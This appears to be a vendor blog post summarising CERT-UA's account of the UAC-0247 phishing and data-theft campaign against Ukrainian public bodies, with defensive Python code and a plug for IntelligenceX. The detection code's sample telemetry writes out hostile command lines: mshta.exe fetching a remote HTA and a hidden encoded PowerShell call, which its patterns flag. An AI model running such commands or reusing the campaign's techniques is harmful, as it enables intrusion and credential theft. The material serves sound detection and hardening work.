Abhay Negi
UAC-0247 Campaign Targets Ukrainian Public Sector with Multi-Stage Data Theft Malware

Ukraine’s cybersecurity authority, CERT-UA, has uncovered a targeted cyber campaign aimed at government organizations and healthcare institutions, including clinics and emergency medical services. The operation, identified as UAC-0247, involves the delivery of sophisticated malware designed to extract sensitive data from Chromium-based browsers and WhatsApp environments.

The campaign was active between March and April 2026, and although the identity of the attackers has not yet been confirmed, the structure and execution of the attack indicate a capable and persistent threat group. This activity highlights how attackers are increasingly combining social engineering techniques with complex malware chains to infiltrate critical infrastructure.

Phishing as the Initial Entry Point

The attack begins with phishing emails crafted to resemble legitimate humanitarian aid proposals. This theme appears to be intentionally chosen to exploit trust and urgency, increasing the likelihood that recipients will engage with the message.

Victims are prompted to click on a link included in the email. Depending on the scenario, this link leads either to a compromised legitimate website or to a fake page generated using artificial intelligence tools. In the case of legitimate sites, attackers exploit cross-site scripting vulnerabilities to inject malicious content. Regardless of the approach, the ultimate goal is to convince the victim to download and execute a malicious file.

Execution Flow and Payload Delivery

Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut (LNK) file. This file serves as the initial execution vector. When opened, it uses the Windows utility “mshta.exe” to launch a remote HTML Application (HTA).

The HTA file plays a dual role. It presents a decoy interface to maintain the appearance of legitimacy while silently downloading a secondary payload. That payload injects shellcode into trusted system processes such as RuntimeBroker.exe, so the malware runs under a name that blends into normal process activity.

CERT-UA has also identified more advanced variants of the attack that utilize a two-stage loader. The second stage is implemented using a custom executable format that supports structured code execution and dynamic linking. The final payload is both compressed and encrypted, making analysis and detection more challenging.

Establishing Remote Access

A critical component of the campaign is the deployment of a reverse shell tool known as RAVENSHELL. This tool establishes a TCP connection with a command-and-control server, enabling attackers to execute commands remotely using standard system utilities like cmd.exe.

In addition to RAVENSHELL, attackers deploy a malware family called AGINGFLY along with a PowerShell script named SILENTLOOP. AGINGFLY, developed in C#, provides full remote control capabilities over the infected system. It communicates with its command server using WebSockets and can execute commands, log keystrokes, download files, and deploy additional payloads.

SILENTLOOP enhances the resilience of the attack by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure continued communication even if primary channels are disrupted.

Data Exfiltration and Post-Compromise Activities

Analysis of multiple incidents linked to UAC-0247 shows that attackers focus heavily on reconnaissance and data theft. Their primary targets include browser-stored credentials, session data, and private communications.

To facilitate this, they deploy tools capable of bypassing browser encryption mechanisms and extracting stored passwords and cookies from Chromium-based applications. They also use specialized utilities to decrypt WhatsApp Web data, enabling access to user conversations.

Additional tools used in the campaign support network scanning, tunneling, and lateral movement, allowing attackers to expand their reach within compromised environments. Some components also include cryptocurrency mining capabilities, suggesting that financial motives may be part of the operation.

There are also indications that individuals associated with Ukraine’s defense sector have been targeted. In these cases, malicious archives were distributed through messaging platforms, further extending the scope of the campaign.

Why Detection Is Difficult

The techniques used in this campaign make it particularly challenging to detect. By leveraging legitimate system utilities, encrypted payloads, and multi-stage execution chains, attackers are able to bypass many traditional security measures.
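The chain described above still leaves a trail in process-creation telemetry: a shortcut opened from Explorer runs mshta.exe with a URL, the HTA hands off to PowerShell, and an injected RuntimeBroker.exe later spawns cmd.exe for the reverse shell. The following is an added example (not CERT-UA's or the author's code) that runs four such parent/child and command-line heuristics over a constructed, Sysmon-like JSON-lines sample; the field names (ts, pid, image, cmdline, parent_image), the URL and the paths are assumptions, not a real product schema or real indicators.

```python
"""Process-creation heuristics for the execution chain described in the post.

Added example, not CERT-UA's or the author's code. Events are a constructed,
Sysmon-like JSON-lines subset (fields ts, pid, image, cmdline, parent_image);
the field names are an assumption, not a real product schema.
"""
import json
import re

# Constructed sample telemetry following the chain in the post: a shortcut
# opened from Explorer runs mshta.exe against a remote HTA, the HTA stages a
# payload through PowerShell, and an injected RuntimeBroker.exe later spawns
# cmd.exe for the reverse shell. The URL and paths are placeholders, not IoCs.
SAMPLE_EVENTS = r"""
{"ts": "2026-03-12T09:14:02Z", "pid": 4120, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe https://example.invalid/aid-proposal.hta", "parent_image": "C:\\Windows\\explorer.exe"}
{"ts": "2026-03-12T09:14:05Z", "pid": 4188, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA", "parent_image": "C:\\Windows\\System32\\mshta.exe"}
{"ts": "2026-03-12T09:14:40Z", "pid": 4310, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe", "parent_image": "C:\\Windows\\System32\\RuntimeBroker.exe"}
{"ts": "2026-03-12T09:20:00Z", "pid": 5002, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe C:\\Program Files\\Vendor\\setup.hta", "parent_image": "C:\\Program Files\\Vendor\\installer.exe"}
{"ts": "2026-03-12T09:21:00Z", "pid": 5100, "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe", "parent_image": "C:\\Windows\\explorer.exe"}
"""

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# PowerShell accepts abbreviated forms of -EncodedCommand.
ENCODED_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)(?=\s|$)", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Processes that have no business spawning a shell; a child shell here is a
# sign that injected code, not the host's own logic, is running.
NO_SHELL_PARENTS = {"runtimebroker.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> list[str]:
    """Return the names of every heuristic the event matches, in rule order."""
    image = basename(ev["image"])
    parent = basename(ev["parent_image"])
    cmdline = ev["cmdline"]
    findings = []
    # 1. mshta.exe given a URL: the remote-HTA launch performed by the LNK.
    if image == "mshta.exe" and URL_RE.search(cmdline):
        findings.append("mshta_remote_hta")
    # 2. A script host (mshta/wscript/cscript) handing off to PowerShell.
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        findings.append("powershell_from_script_host")
    # 3. Base64-encoded PowerShell command line.
    if image in POWERSHELL and ENCODED_RE.search(cmdline):
        findings.append("powershell_encoded")
    # 4. A shell spawned by a process that should never spawn one.
    if image in SHELLS and parent in NO_SHELL_PARENTS:
        findings.append("shell_from_unexpected_parent")
    return findings


def scan(jsonl: str) -> list[dict]:
    """Run classify() over JSON-lines telemetry and return only the hits."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        findings = classify(ev)
        if findings:
            alerts.append({"ts": ev["ts"], "pid": ev["pid"],
                           "image": basename(ev["image"]), "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["ts"], alert["pid"], alert["image"], ", ".join(alert["findings"]))
```

On the sample, the first three events fire (remote HTA, PowerShell under mshta.exe with an encoded command, cmd.exe under RuntimeBroker.exe) while the vendor installer's local HTA and notepad.exe stay quiet. Rule 1 is deliberately narrow (mshta.exe plus a URL) so that legitimate local HTAs do not alert; widen or tighten each rule against your own baseline of parent/child pairs before enforcing it, and keep the four findings separate so an analyst can see which link of the chain tripped.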

This is where platforms like IntelligenceX can play an important role. By providing visibility into exposed infrastructure, malicious domains, and attacker behavior, IntelligenceX helps organizations identify threats before they escalate.

Security teams can use IntelligenceX to monitor suspicious domains, analyze command-and-control infrastructure, and correlate threat intelligence across multiple sources. This level of insight is essential when dealing with advanced and stealthy campaigns.

Recommended Defensive Measures

To reduce the risk associated with such attacks, CERT-UA recommends restricting the execution of potentially dangerous file types such as LNK, HTA, and JavaScript files. It is also important to limit the use of built-in Windows utilities like mshta.exe, PowerShell, and wscript.exe, which are frequently abused by attackers.
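One concrete way to apply CERT-UA's recommendation on Windows is an AppLocker policy that denies the named utilities for standard users and blocks scripts run from user profiles. The following is an added example, not CERT-UA's or the author's code: it generates such a policy with Python's standard library. The AppLocker element names (AppLockerPolicy, RuleCollection, FilePathRule, FilePathCondition), the %SYSTEM32%/%WINDIR%/%OSDRIVE%/%PROGRAMFILES% path variables and the well-known SIDs are real; the rule names, the choice of BUILTIN\Users (S-1-5-32-545) as the denied group and the assumption that administrators work from accounts outside that group are ours.

```python
"""Generate an AppLocker policy that denies mshta.exe, wscript.exe, cscript.exe
and powershell.exe for standard users and blocks scripts run from user profiles.

Added example, not CERT-UA's or the author's code. Rule GUIDs are generated at
run time; rule names and the denied-group choice are assumptions.
"""
import uuid
import xml.etree.ElementTree as ET

EVERYONE = "S-1-1-0"
ADMINISTRATORS = "S-1-5-32-544"
USERS = "S-1-5-32-545"  # BUILTIN\Users: the context a phished user runs in

# Built-in utilities the post names as frequently abused, both architectures.
DENIED_EXES = [
    r"%SYSTEM32%\mshta.exe", r"%WINDIR%\SysWOW64\mshta.exe",
    r"%SYSTEM32%\wscript.exe", r"%WINDIR%\SysWOW64\wscript.exe",
    r"%SYSTEM32%\cscript.exe", r"%WINDIR%\SysWOW64\cscript.exe",
    r"%SYSTEM32%\WindowsPowerShell\v1.0\powershell.exe",
    r"%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
]
# Script collection (.ps1/.bat/.cmd/.vbs/.js): deny anything started from a
# user profile, which is where phishing downloads land.
DENIED_SCRIPT_PATHS = [r"%OSDRIVE%\Users\*"]


def _path_rule(parent, path, action, sid, name):
    """Append one FilePathRule with a single path condition."""
    rule = ET.SubElement(parent, "FilePathRule", Id=str(uuid.uuid4()), Name=name,
                         Description="", UserOrGroupSid=sid, Action=action)
    ET.SubElement(ET.SubElement(rule, "Conditions"), "FilePathCondition", Path=path)
    return rule


def _collection(policy, kind, mode, denies):
    """Build one RuleCollection with AppLocker's default allows plus our denies."""
    coll = ET.SubElement(policy, "RuleCollection", Type=kind, EnforcementMode=mode)
    # Default allow rules. Without an allow rule, an enforced collection blocks
    # everything, so shipping only deny rules would break the machine.
    _path_rule(coll, r"%PROGRAMFILES%\*", "Allow", EVERYONE, "Allow Program Files")
    _path_rule(coll, r"%WINDIR%\*", "Allow", EVERYONE, "Allow Windows folder")
    _path_rule(coll, "*", "Allow", ADMINISTRATORS, "Allow administrators everything")
    # Explicit deny rules take precedence over allow rules in AppLocker.
    for path in denies:
        _path_rule(coll, path, "Deny", USERS, f"Deny {path} for Users")
    return coll


def build_policy(mode: str = "AuditOnly") -> str:
    """Return the policy XML. Start with AuditOnly, review the audit events,
    then switch to Enabled (valid modes: NotConfigured, AuditOnly, Enabled)."""
    policy = ET.Element("AppLockerPolicy", Version="1")
    _collection(policy, "Exe", mode, DENIED_EXES)
    _collection(policy, "Script", mode, DENIED_SCRIPT_PATHS)
    return ET.tostring(policy, encoding="unicode")


def denied_paths(xml_text: str, kind: str) -> list[str]:
    """Paths carrying Action=Deny in the given collection, for checking output."""
    root = ET.fromstring(xml_text)
    return [cond.get("Path")
            for coll in root.findall(f"RuleCollection[@Type='{kind}']")
            for rule in coll.findall("FilePathRule[@Action='Deny']")
            for cond in rule.findall("Conditions/FilePathCondition")]


if __name__ == "__main__":
    print(build_policy())
```

Import the output with Set-AppLockerPolicy -XmlPolicy (or through Group Policy) with the Application Identity service running. Two limits worth knowing: AppLocker has no collection for .lnk or .hta files themselves, so denying mshta.exe is what actually stops HTAs, and .lnk handling must come from mail and download filtering; and because explicit denies win over allows, the PowerShell deny will also bite any administrator who is a member of Users, which is why the example keeps AuditOnly as the default mode.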

Organizations should also strengthen their monitoring capabilities, educate users about phishing risks, and integrate threat intelligence into their security operations.

Conclusion

The UAC-0247 campaign demonstrates how modern cyber threats are evolving in complexity and sophistication. By combining social engineering with advanced malware techniques, attackers are able to target critical sectors with increasing precision.

To effectively defend against such threats, organizations must adopt a proactive approach that includes improved visibility, intelligence-driven security, and strong internal controls. Leveraging platforms like IntelligenceX, along with robust cybersecurity practices, can significantly enhance an organization’s ability to detect and respond to these evolving threats.
